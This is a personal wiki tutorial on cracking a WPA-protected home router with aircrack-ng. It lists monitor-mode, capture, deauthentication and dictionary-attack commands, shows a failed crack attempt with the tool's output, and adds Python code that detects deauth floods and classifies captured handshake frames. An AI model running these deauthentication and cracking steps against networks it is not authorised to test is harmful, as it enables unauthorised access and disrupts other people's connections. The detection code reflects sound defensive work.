Aircrack/WPA Cracking
From charlesreid1
Revision as of 20:44, 30 July 2015
Now that we've successfully walked through setting up our router as a WEP access point and cracked it on the Aircrack/WEP Cracking page, let's try attacking a WPA encrypted network.
Note that WPA and WPA2 are different. See below for notes.
The Background
As with the WEP attack we covered, this attack will use aircrack-ng to capture lots and lots of packets, then use those packets to brute-force guess the wireless network's passphrase.
WPA or WPA2?
From here:
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
Here's what the security settings page might look like:
The Hardware
The hardware for simulating this attack on my home network consisted of:
- a router/wireless access point - this router controls the wireless network being attacked
- a laptop running Kali Linux - this is where the attack is being launched from
- a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary
The Software
You'll need a laptop running Kali, which will have aircrack-ng installed. That should be all the software you need.
The Procedure
Set Router to WPA
Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.
Now let's pick an easy password, for the sake of example. Like, uh, the word password.
Now we've got our WPA/WPA2-enabled router with our super-secure password of "password" - time to get to work.
Check Wireless Devices
Now that you have your WPA/WPA2 network enabled, open up your Kali laptop. Check the wireless devices available on the computer:
$ iwconfig
Once again, we'll be using the Panda Wireless USB dongle at wlan2.
Switch Wireless Device to Monitor Mode
Now use Aircrack to put the wireless device into monitoring mode:
$ airmon-ng start wlan2
This will take wlan2 down and replace it with wlan2mon.
Now we're ready to scan available networks and find our WPA/WPA2 router.
Scan Networks
Now you can scan the wireless access points around you by running:
$ airodump-ng wlan2mon
Make a note of your target router's channel number and MAC address.
Begin the Attack
Tip: you should probably change your MAC address before you get started. See Kali/Change MAC Address
Window 1: Monitor Traffic on the Network
In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:
$ airodump-ng --bssid AA:BB:CC:DD:EE:FF -c XX -w aircrack_output wlan2mon
Connect Third Party to Network
The weakness we're taking advantage of in WPA is the handshake process: when a client authenticates with the network, it and the access point exchange a four-way handshake built from the passphrase-derived key so the network can verify the client. If an attacker captures the packets of this handshake, they have enough to test passphrase guesses against it offline, i.e. to crack it by brute force.
What this means for us is, we have to witness the handshake process. So don't connect your third party to the network until you're ready and monitoring traffic.
When you're ready, connect your third party device to the network.
Window 2: Artificially Stimulate Packet Traffic
WARNING: The purpose of this step is unclear.
Note: Before doing the following step, you should close any terminal window that is running a scan of all available networks. This type of scan causes the card to constantly hop around on channels, which will cause errors about a mismatching channel between your target and your wireless device.
In window 2, we'll use aireplay to craft packets:
$ ifconfig
$ aireplay-ng --deauth 1 -a <target mac address> -c <third party mac address> wlan2mon
This will generate fake deauthentication packets, making the third-party client connected to the wireless network think it has been deauthenticated, so it re-authenticates and re-sends its credentials (the handshake derived from the password), which is exactly what we need to capture.
This is Attack Mode Zero in the Aircrack manual.
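The deauthentication step above is also what a wireless IDS looks for: a real client sees the odd deauth when it roams, but aireplay-ng produces a burst of them against one BSSID. The detector below is an added example (not from this page or the aircrack-ng project) that parses raw 802.11 management headers from a constructed sample capture and raises one alert per burst; it assumes frames with the radiotap header already stripped, the AP MAC from the page's aircrack output, and a made-up client MAC.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame-control (type, subtype) pairs that knock a station off the network.
DISRUPT_SUBTYPES = {(0, 12): "deauth", (0, 10): "disassoc"}

def parse_80211_header(frame):
    """Return (type, subtype, addr1, addr2, addr3) from a raw 802.11 MAC header (no radiotap)."""
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return ftype, subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])

def detect_deauth_flood(frames, window_s=2.0, threshold=5):
    """frames: iterable of (timestamp, raw_frame) in capture order.
    Emits one alert per (bssid, kind) burst once `threshold` frames land within `window_s`
    seconds; a lone deauth (normal roaming noise) never trips it."""
    recent, alerts, alerted = defaultdict(deque), [], set()
    for ts, raw in frames:
        ftype, subtype, _dst, _src, bssid = parse_80211_header(raw)
        kind = DISRUPT_SUBTYPES.get((ftype, subtype))
        if kind is None:
            continue
        q = recent[(bssid, kind)]
        q.append(ts)
        while ts - q[0] > window_s:          # slide the window forward
            q.popleft()
        if len(q) >= threshold and (bssid, kind) not in alerted:
            alerted.add((bssid, kind))
            alerts.append({"bssid": bssid, "kind": kind, "count": len(q),
                           "first_ts": q[0], "last_ts": ts})
        elif len(q) < threshold:
            alerted.discard((bssid, kind))   # burst ended; re-arm for the next one
    return alerts

def mgmt_frame(subtype, dst, src, bssid, reason=7):
    """Build a minimal management-frame record for the constructed sample capture below."""
    macs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    return bytes([subtype << 4, 0]) + b"\x00\x00" + macs + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample capture: AP MAC is the one from the page's aircrack output; client MAC is made up.
AP, CLIENT = "74:85:2a:97:5b:08", "02:00:00:00:00:01"
SAMPLE_CAPTURE = (
    [(0.0, mgmt_frame(8, "ff:ff:ff:ff:ff:ff", AP, AP)),   # beacon, ignored
     (1.0, mgmt_frame(12, CLIENT, AP, AP))]               # one deauth: not a flood
    + [(5.0 + i * 0.1, mgmt_frame(12, CLIENT, AP, AP)) for i in range(8)]  # eight in 0.7 s: flood
)
```

Feeding it frames from a monitor-mode capture (e.g. the airodump-ng output file above, after stripping radiotap) turns the attack described here into a detection.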
Analysis
First Attempt
Now we've got what we need in our network capture file. Let's try and crack this password.
I downloaded a list of the 10,000 most common passwords (hint: ours is number one on the list) from SecLists on GitHub.
Run Aircrack against the captured data to crack the WPA key, specifying the 10k most common passwords as my wordlist:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap
Opening aircrack_output-05.cap
Read 81013 packets.

   #  BSSID              ESSID     Encryption
   1  74:85:2A:97:5B:08  Walrus    WPA (1 handshake)

Choosing first network as target.

Opening aircrack_output-05.cap
Reading packets, please wait...

Aircrack-ng 1.2 rc2

[00:00:00]  192 keys tested (1269.55 k/s)
[00:00:00]  392 keys tested (1287.03 k/s)   Current passphrase: cadillac
[00:00:00]  592 keys tested (1298.17 k/s)   Current passphrase: mariners
[00:00:00]  788 keys tested (1293.03 k/s)   Current passphrase: commando
[00:00:00]  988 keys tested (1293.68 k/s)   Current passphrase: films+pic+galeries
[00:00:00] 1188 keys tested (1297.01 k/s)   Current passphrase: vikings1
[00:00:01] 1384 keys tested (1298.15 k/s)   Current passphrase: hotmail1
[00:00:01] 1580 keys tested (1298.30 k/s)   Current passphrase: aviation
[00:00:01] 1776 keys tested (1298.07 k/s)   Current passphrase: riffraff
[00:00:01] 1964 keys tested (1293.49 k/s)   Current passphrase: smirnoff
                                            Current passphrase: skeeter1

Passphrase not in dictionary
Quitting aircrack-ng...
Oh?
Subsequent Attempts
I tried a reboot and repeated the steps above, and got the same result.
I tried adding a second client to the network, to increase the number of potential handshakes. I still saw the same problem - passphrase not in dictionary.
I then tried disconnecting and reconnecting to the wireless network from third-party clients - I was using two smartphones - in the hopes that those handshake packets would be captured. However, in every scenario I tried, there was always only 1 handshake captured.
Possible Failure Points
Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airodump-ng)
Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.
Not letting it run long enough? I suspect this may be the issue.
Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.
Wireshark
Can use Wireshark to analyze some of these packet captures. From this site: "Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets."
From this page comes a great explanation of how to analyze those packets.
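The 'eapol' filter tells you how many EAPOL frames are present; which of the four handshake messages they are is decided by the Key Information flags inside each EAPOL-Key frame. The classifier below is an added example (not from this page, Wireshark or aircrack-ng) that reads those flags and groups messages by AP/client pair, so a capture that "has a handshake" but only holds one or two of the four messages shows up as such. It assumes the EAPOL payload has already been extracted from the 802.11 data frame, the AP MAC from the page's output, a made-up client MAC, and the flag values Wireshark typically shows for an AES/CCMP handshake.

```python
import struct
from collections import defaultdict
# Key Information flag bits of an EAPOL-Key frame (IEEE 802.11i).
PAIRWISE, INSTALL, ACK, MIC, SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200

def classify_eapol_key(pkt):
    """Map one EAPOL frame to its 4-way handshake message number (1-4), or None."""
    _version, etype, length = struct.unpack(">BBH", pkt[:4])
    if etype != 3:                       # 3 = EAPOL-Key
        return None
    body = pkt[4:4 + length]
    descriptor, key_info = struct.unpack(">BH", body[:3])
    if descriptor not in (2, 254) or not key_info & PAIRWISE:  # 2 = RSN/WPA2, 254 = WPA; skip group-key frames
        return None
    key_data_len = struct.unpack(">H", body[93:95])[0]         # field sits right after the 16-byte MIC
    if key_info & ACK and not key_info & MIC:
        return 1                         # AP -> STA: ANonce, no MIC yet
    if key_info & ACK and key_info & INSTALL:
        return 3                         # AP -> STA: ANonce again, MIC, encrypted GTK
    if key_info & MIC and not key_info & ACK:
        # M2 and M4 share flags; M4 carries no key data (and sets Secure under RSN)
        return 4 if key_info & SECURE or key_data_len == 0 else 2
    return None

def handshake_summary(frames):
    """frames: iterable of (sender, receiver, eapol_bytes). Returns {(ap, sta): [messages seen]}."""
    seen = defaultdict(set)
    for src, dst, pkt in frames:
        msg = classify_eapol_key(pkt)
        if msg is None:
            continue
        ap, sta = (src, dst) if msg in (1, 3) else (dst, src)
        seen[(ap, sta)].add(msg)
    return {pair: sorted(msgs) for pair, msgs in seen.items()}

def eapol_key(key_info, key_data=b""):
    """Build a constructed RSN EAPOL-Key frame with zeroed nonce/MIC fields (enough for classification)."""
    body = struct.pack(">BHH", 2, key_info, 16) + bytes(88) + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body

# Constructed sample: AP MAC from the page's aircrack output, client MAC made up, usual CCMP flag values.
AP, STA = "74:85:2a:97:5b:08", "02:00:00:00:00:01"
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
FULL_HANDSHAKE = [
    (AP, STA, eapol_key(0x008A)),            # M1
    (STA, AP, eapol_key(0x010A, RSN_IE)),    # M2, carries the client's RSN IE
    (AP, STA, eapol_key(0x13CA, bytes(24))), # M3, encrypted key data
    (STA, AP, eapol_key(0x030A)),            # M4
]
```

A summary showing only [1] for a pair explains a "1 handshake" capture that still cannot be cracked: the client's reply never made it into the file.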